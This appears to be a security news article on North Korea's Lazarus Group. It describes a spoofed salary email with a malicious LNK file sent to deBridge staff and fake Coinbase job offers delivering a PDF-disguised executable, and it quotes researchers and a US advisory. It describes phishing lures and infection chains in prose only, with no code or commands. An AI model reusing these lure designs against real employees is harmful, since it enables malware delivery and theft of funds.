The North Korean state-sponsored threat actor Lazarus has long brought the definitions used by security researchers into doubt. Typically, state-sponsored groups are not financially motivated but motivated by the policies and aims of their state overlords.
Lazarus is both in a sense that not only do they conduct cyber espionage and campaigns to further North Korea’s geopolitical ambitions but will also attempt to complete financially motivated attacks such as ransomware, attacks on banks, and attempts to steal crypto.
Campaigns to steal crypto seem to have ramped up in the last few months and two separate events, in particular, show Lazarus is hard at work attempting to steal your crypto.
The first of which involves Lazarus hackers attempting to compromise the deBridge platform. deBridge Finance operates as a cross-chain protocol that enables the decentralized transfer of assets between various blockchains.
Lazarus sent specially crafted spam emails to deBridge employees that would try and trick employees into downloading malware.
The malware in question would attempt to harvest information on Windows machines and lay the groundwork for the delivery of future malicious payloads. The email was crafted to appear from company co-founder, Alex Smirnov, allegedly sharing new information about salary changes, in an attempt to trick employees.
Interestingly, the email contains an HTML file, alleging to be the salary changes applicable to employees and another file labeled “password.txt”.
The latter file is an LNK file, as was covered in a previous article published on this platform, we saw how threat actors were increasingly using LNK files as an attack vector following Microsoft severely limiting macros by default.
The intended attack chain begins with the unsuspecting employee clicking the HTML file which is masquerading as a PDF. Then the employee would be presented with a password-protected cloud archive prompting them to open the malicious LNK file.
If the LNK is opened it initiates a Command Prompt command that will fetch the malicious payload. The payload is in turn saved in the machine's startup folder in an attempt to ensure persistence on the now infected machine.
The malware will also check if security solutions from ESET, Tencent, and Bitdefender are installed.
Lazarus has been determined to be the threat actor in this case based on the overlap in file names and infrastructure used in a previous attack attributed to the threat actor. On such campaign where overlap in file names and infrastructure occurred was CryptoCore with researchers from clear sky noting,
“We adopted F-SECURE’s attribution to LAZARUS. Then we reaffirmed this attribution by comparing the attack tools found in this campaign to other Lazarus campaigns and found strong similarities.”
Fake Coinbase Job Offers
In a separate attack campaign, Lazarus threat actors have been seen targeting employees in the Fintech industry with fake job offers from Coinbase.
The campaign was discovered by Malwarebytes researcher Hossein Jazi, who has played particular attention to recent Lazarus activity. Jazi noted that the campaign is targeting candidates suitable for the role of “Engineering Manager, Product Security.”
Given that Coinbase is one of the cryptocurrency industry's most successful organizations, the threat actors are attempting to swing a rather enticing carrot in front of potential job seekers. Bleeping Computer noted,
“When victims download what they believe to be a PDF about the job position, they are actually getting a malicious executable using a PDF icon. In this case, the file is named "Coinbase_online_careers_2022_07.exe," which will display the decoy PDF document shown below when executed while also loading a malicious DLL.”
In a departure from tactics covered in the first campaign covered in the article, once executed, the malware will use GitHub as a command and control server to receive commands to perform on the infected device.
The use of fake job offers is not without precedent in Lazarus’ dubious past. Fake job offers to Lockheed Martin and General Dynamics, have been seen in the past attempting to trick victims into installing malware.
So far in 2022, Lazarus has shifted much of its attention to cryptocurrency targets, be they currency bridges, exchanges, and even NFT marketplaces.
North Korea is heavily sanctioned with only Russia and China as trading partners, and even then the trade volumes can be seen as fairly negligible in a global context.
This has meant that the country's ruling regime is forced to get creative in how it gets funds for its missile and nuclear weapons projects. In the past, Lazarus has been seen stealing billions of dollars from third-world banks, now it appears anything crypto-related is a legitimate target.
This has even resulted in the development of malicious cryptocurrency applications like wallets that will steal users' cryptocurrency, as the US warned,
“The U.S. government has identified a group of North Korean state-sponsored malicious cyber actors using tactics similar to the previously identified Lazarus Group (see AppleJeus: Analysis of North Korea’s Cryptocurrency Malware). The Lazarus Group used AppleJeus to trojanized cryptocurrency applications targeting individuals and companies—including cryptocurrency exchanges and financial services companies—through the dissemination of cryptocurrency trading applications that were modified to include malware that facilitates theft of cryptocurrency. As of April 2022, North Korea’s Lazarus Group actors have targeted various firms, entities, and exchanges in the blockchain and cryptocurrency industry using spearphishing campaigns and malware to steal cryptocurrency. These actors will likely continue exploiting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime.”